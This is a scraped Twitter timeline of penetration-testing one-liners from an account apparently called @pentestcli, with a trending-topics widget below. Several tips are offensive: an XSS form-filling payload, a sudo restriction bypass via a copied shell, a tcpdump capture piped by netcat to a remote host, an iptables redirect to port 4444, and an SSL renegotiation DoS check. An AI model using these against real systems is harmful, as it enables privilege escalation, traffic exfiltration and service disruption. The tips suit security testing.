你可能會喜歡
console> for (i=0;i<document.forms[0].elements.length;i++) { document.forms[0].elements[i].value='<script>alert('+i+')</script>'; } #testxss
Hacky quick and dirty HTTPS server: python -m SimpleHTTPServer & ncat --ssl -l 8443 --sh-exec "ncat 127.0.0.1 8000" --keep-open
Increment over string to generate fuzz list in #ruby: str = 'somestring'; a = ''; str.each_char {|b| a << b; puts a }
Avoiding sudo regex interactive restrictions: cp /bin/sh /tmp/foo; sudo /tmp/foo
@pentestcli nc -lvp 9999 | tcpdump -XX -vvv -r - # Pass traffic FROM a raw tcp socket back into tcpdump for rendering/parsing
@pentestcli tcpdump -w - | nc -v 8.8.8.8 9999 # sniff traffic with tcpdump and write raw capture data to a remote tcp socket
@pentestcli wget example.com/file.txt -O - # Use wget to write to stdout instead of a file if CURL isn't available
@pentestcli grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' # Basic regex for pulling IP addresses from a file or stdout
@zyx2k @pentestcli ps aux | grep [p]rocessname | sed s/’whoami’[^0-9]*// | cut -d “ “ -f 1 :)
Use irb to update a host in #msfconsole: `framework.db.report_host(:host=>"X.X.X.X",:info=>"Cool")` cc: @pentestcli @metasploit
RT @hdmoore GNU sort can order input by IPv4 address using -V or --version-sort < This is awesome! CC @climagic @pentestcli
“@bonsaiviking: @pentestcli #Perl perl -e 'printf "%.8i\n", $_ for (0..99999999)'” < in perl too :-)
#ruby to print out all 8 digit numbers: ruby -e '(00000000..99999999).each {|x| puts "%.8i" % x}'
Make XML human-readable: xmllint --format --encode utf-8 document.xml
Awesome reference for #ruby one-liners reference.jumpingmonkey.org/programming_la…
@pentestcli ssh [email protected] "cat file.tar.gz" > file.tar.gz # transfer files through ssh when sftp is disabled
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 # internal port redirect to bypass services (cc. @pentestcli)
Quick test for SSL/TLS Renegotiation DoS - openssl s_client -connect ip:port | echo -e "HEAD / HTTP/1.0\r\nR" @pentestcli
United States 趨勢
- 1. #DWTS 37.5K posts
- 2. Alix 10.4K posts
- 3. Robert 98.9K posts
- 4. Dylan 32.1K posts
- 5. Elaine 34.4K posts
- 6. Carrie Ann 3,451 posts
- 7. Anthony Black 2,270 posts
- 8. Drummond 2,343 posts
- 9. #WWENXT 6,834 posts
- 10. Suggs 2,262 posts
- 11. Jalen Johnson 3,700 posts
- 12. Ezra 10.8K posts
- 13. #DancingWithTheStars 1,133 posts
- 14. Godzilla 31K posts
- 15. Wizards 8,570 posts
- 16. CJ McCollum 1,527 posts
- 17. #NXTGoldRush 5,556 posts
- 18. Bruce Pearl N/A
- 19. #iubb N/A
- 20. Brown 154K posts
Something went wrong.
Something went wrong.